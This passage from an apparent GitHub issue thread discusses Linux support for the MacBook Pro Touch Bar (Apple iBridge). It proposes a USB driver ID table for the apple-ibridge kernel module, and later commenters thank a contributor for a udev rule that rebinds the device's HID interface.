The `apple-ibridge.c` module should ideally register a **`struct usb_driver`** in addition to its ACPI and HID muxer drivers. This `usb_driver` would:

1.  **Have a `usb_device_id` table** that specifically matches both USB Interface 2 and USB Interface 3 of the iBridge device (VID:05AC, PID:8600). This match could be based on VID, PID, and `bInterfaceNumber`.
    ```c
    // Example ID table entries for the usb_driver in apple-ibridge.c
    static const struct usb_device_id apple_ibridge_usb_table[] = {
        { USB_DEVICE_INTERFACE_NUMBER(USB_ID_VENDOR_APPLE, USB_ID_PRODUCT_IBRIDGE, 2) }, // For Interface 2
        { USB_DEVICE_INTERFACE_NUMBER(USB_ID_VENDOR_APPLE, USB_ID_PRODUCT_IBRIDGE, 3) }, // For Interface 3
        { } /* Terminating entry */
    };
    MODULE_DEVICE_TABLE(usb, apple_ibridge_usb_table);
    ```
    *(Note: `USB_DEVICE_INTERFACE_NUMBER` might require specific kernel versions or a custom macro if not standardly available for this exact purpose in `usb_device_id`.)*
    Alternatively, a more general `USB_DEVICE(USB_ID_VENDOR_APPLE, USB_ID_PRODUCT_IBRIDGE)` could be used, and the USB probe function would then check `interface->cur_altsetting->desc.bInterfaceNumber` to differentiate.

[... cut ...]
3.  **Coordination:** The `apple-ibridge` ACPI driver would still be responsible for overall device power management (`SOCW`) and MFD cell creation. The new USB driver component would handle the binding to the specific USB interfaces that expose HID functionality, ensuring they are passed to the `apple-ibridge-hid` muxer.

This approach would make the driver self-contained and less reliant on `udev` rules to fight for interface control, leading to a more stable and predictable initialization sequence for all necessary Touch Bar components.

jussike, 2025-06-12:
@scuty2000 Great work, thank you.

I'm evaluating Cachyos (linux 6.15) on my MBP. Unfortunately neither of workarounds (via udev or via systemd service) works. So it really looks like we need a patch to the driver. Maybe we can try to get it to upstream if it works well? Are you able to test your driver level ideas?

daduke, 2025-09-02:
> **Workaround Implemented (via `udev` rule):**
> 
> To resolve this, a `udev` rule was created to forcibly unbind `hid-sensor-hub` from the `hid_device` associated with USB Interface 3, and then attempt to re-trigger a driver probe for that `hid_device`, allowing `apple-ibridge-hid` to claim it.
> 
> The effective `udev` rule in `/etc/udev/rules.d/98-apple-ibridge-custom.rules`:
> 
> ```
> ACTION=="add", SUBSYSTEM=="hid", ENV{HID_ID}=="0003:000005AC:00008600", ENV{HID_PHYS}=="*input3", ATTR{driver}=="hid-sensor-hub", \
>   RUN+="/bin/sh -c '/usr/bin/logger -t UDEV-IBRIDGE Unbinding %k from hid-sensor-hub; echo %k > /sys%p/driver/unbind; /usr/bin/logger -t UDEV-IBRIDGE Unbound %k. Attempting to trigger drivers_probe; echo %k > /sys/bus/hid/drivers_probe; exit 0'"
> ```

you sir are a genius. For 2 weeks I had been trying to enable the touchbar on  an 13,2 and it just wouldn't work. Your udev rule made it light up for the first time!

thanks a lot,
-Christian